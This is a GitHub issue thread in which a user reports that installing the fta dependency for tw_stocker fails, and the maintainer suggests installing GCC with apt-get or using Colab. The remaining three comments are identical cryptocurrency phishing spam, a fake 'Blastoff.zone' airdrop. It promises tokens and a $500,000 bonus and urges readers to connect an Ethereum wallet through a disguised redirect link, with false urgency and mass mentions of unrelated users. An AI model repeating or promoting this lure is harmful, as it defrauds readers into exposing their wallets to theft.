### ISSUE TITLE
Requirements install failed

### ISSUE THREAD

**Issue by koshou1010** [voidful/tw_stocker#1]
When install fta, there was a failed.
win10 and ubuntu22.04 I try, there are same result.
python version is 3.10

<img width="955" alt="螢幕擷取畫面 2024-04-17 143321" src="https://github.com/voidful/tw_stocker/assets/76564170/460777f7-ea35-48ce-b3a7-f9b372128fd6">

**Comment by voidful** [comment]
To ensure the program functions correctly, you will need to install GCC. You can do this on Debian-based systems by running the command:
```
sudo apt-get install -y build-essential gcc
```
Alternatively, you can use Google Colab, which provides a ready-to-use environment with GCC already installed, to run your code.

**Comment by kobirbd18** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
wikimore, @thiagoms1987, @krsna24x7, @Jappler85, @owinoalfred, @Minisway, @omasanori, @tmxlo, @Gilkovitch, @Amo-Addai, @Thomas-F17, @5oclockshadow, @frankzamboni, @calvinturner, @Blaine-Mason, @Jeisondls, @KonstantinSch, @DangThuy-97, @Mehyar-ALS, @dodid, @Buen16, @bmport, @f1basik, @Javad-Manashti, @noahkuhn, @efJerryYang, @Pankaj21A, @eXcount, @hallpassby, @Flynail, @Thomashighbaugh, @samchaaa, @nick88msn, @dung1t, @rmfish, @SergKlein, @macd42, @smksevov, @w121211, @slayerjoelk, @jaysonkim, @deepwaver, @trhdigital, @douggiles, @fraineralex, @avatar-lavventura, @fastyangmh, @Cheesecake-mafia, @shayandavoodii, @stonegaopolakowo, @faustogut, @ludviglundgrens, @Javad-Manashti, @coppers-j, @ericyue, @rundef, @ReynardoEW, @wayhome, @Flynail, @krsna24x7, @sydowma, @jonabe, @leoschaabner, @tinaishe-dr16, @bmport, @Dobbias, @macd42, @tomcyrus, @satzynu, @wnklb, @JSquaredJace, @Thomas-F17, @qq776355102, @RagibZaman, @slayerjoelk, @hallpassby, @tommy-ca, @dharmatech, @omasanori, @aero, @DigiTecK3D, @HeisenBug1, @Bourn23, @ggguuuyyy, @weiuniverse, @JackLongKing, @LRossdeutscher, @rtanwar, @ciapekmc, @rravinet, @Cheesecake-mafia, @Buen16, @orsenthil, @Xpipe, @nmrodelo, @amirphl, @calvinturner, @x00b, @tomfurrier

**Comment by kobirbd18** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
FerrariFrank, @trhdigital, @nick88msn, @cbaskauskas, @Alive73, @farukarakaya, @DionysusBenstein, @gderber, @fastyangmh, @seekersoftec, @Smidelis, @danteGiuliano, @gnaoh69, @f1basik, @AlbertoZago, @ysdede, @RoCry, @christophmark, @joestanl3y, @installtech, @sheikhartin, @iewaij, @rswgnu, @douggiles, @timlautk, @fraineralex, @singlautsav, @bzz, @Y4599R, @Reed-Schimmel, @eddipa, @szymanowski, @aarongilman, @ambresh1, @oaheiw, @acsybt, @jryals579, @Blaine-Mason, @changingthetides, @KonstantinSch, @zawadoww, @entimm, @shaggy63, @handiko, @atowersc, @akshata29, @HongjianJR, @ruvr, @owinoalfred, @AndreaCodegoniraptoravis, @ConceptzX, @Atharv-Chaudhari, @shaggy63, @Ganesh-Truth, @goodluck-yh, @Alanvofm, @Mehyar-ALS, @ambresh1, @paderma, @noahkuhn, @sdonche, @hal-3001, @tyzp-INC, @ricezet, @Jeisondls, @AlbertoZago, @liuweikarlie, @wassname, @jagatiyakeval, @qarth, @taonos, @HongjianJR, @solanian, @Minisway, @LorenzoZC, @yyakauleu, @mosh888, @frankzamboni, @calcajack3, @Desttro, @dahebolangkuan, @ycchen1989, @zawadoww, @thiagoms1987, @jack2309, @dm267, @jansmets, @emiliano-f, @stupidhumans, @mvandermeulen, @gnaoh69, @webbt127, @sarthakkaushik, @jonkarde, @smksevov, @KonstantinSch, @spoxus, @SergKlein, @ChadThackray

**Comment by kobirbd18** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Howkid118, @AndreaCodegoni, @nick88msn, @oaheiw, @Y4599R, @fastyangmh, @rmfish, @arash9900, @quant-geek-ind, @pi-3p14, @Bravea, @arkadiusjonczek, @nickleefly, @dumpmemory, @wahyubiman, @Reed-Schimmel, @stonegao, @iewaij, @chadneiro1, @trhdigital, @GCsabi, @hdacebal, @daamine, @AdiSai, @drwggm, @acsybt, @handiko, @level96, @bzz, @claytonmuhoza, @tmxlo, @xiehai1983, @joestanl3y, @khc25, @timlautk, @henrylao, @Leslan, @cbaskauskas, @Minish144, @Thomashighbaugh, @Pankaj21A, @zivwang, @ro0o0o0okie, @hugo2046, @athon-millane, @SathishN, @baloghd, @Amo-Addai, @SVAtanasov, @ohmrefreshacsybt, @Howkid118, @ro0o0o0okie, @AndreaCodegoni, @xiehai1983, @nickleefly, @rmfish, @Minish144, @baloghd, @stonegao, @hugo2046, @tmxlo, @Leslan, @quant-geek-ind, @ohmrefresh, @hdacebal, @handiko, @iewaij, @claytonmuhoza, @Reed-Schimmel, @level96, @arash9900, @Bravea, @pi-3p14, @khc25, @daamine, @athon-millane, @oaheiw, @nick88msn, @joestanl3y, @rahadiana, @GCsabi, @SathishN, @Amo-Addai, @dumpmemory, @trhdigital, @drwggm, @timlautk, @fastyangmh, @bzz, @Pankaj21A, @Thomashighbaugh, @AdiSai, @SVAtanasov, @Laveen-exe, @zivwang, @chadneiro1, @wahyubiman, @cbaskauskas, @quantsolo
